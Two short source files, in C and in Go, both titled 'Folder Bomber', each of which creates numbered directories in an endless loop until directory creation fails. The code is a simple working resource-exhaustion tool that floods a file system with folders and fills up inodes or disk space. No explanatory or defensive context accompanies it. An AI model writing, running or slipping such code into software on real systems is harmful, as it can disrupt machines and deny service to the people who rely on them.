File: Folder Bomber.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

int main() {
    int i = 0;
    char dirname[256];

    while (1) {
        snprintf(dirname, sizeof(dirname), "%d", i);
        if (mkdir(dirname, 0777) != 0) {
            perror("mkdir failed");
            break;
        }
        i++;
    }
    return 0;
}

File: Folder Bomber.go
package main

import (
	"fmt"
	"os"
	"runtime"
)

func main() {
	i := 0
	for {
		dirname := fmt.Sprintf("%d", i)

		var err error
		err = os.Mkdir(dirname, 0777)

		if err != nil {
			fmt.Printf("mkdir failed (%s): %v\n", runtime.GOOS, err)
			break
		}
		i++
	}
}
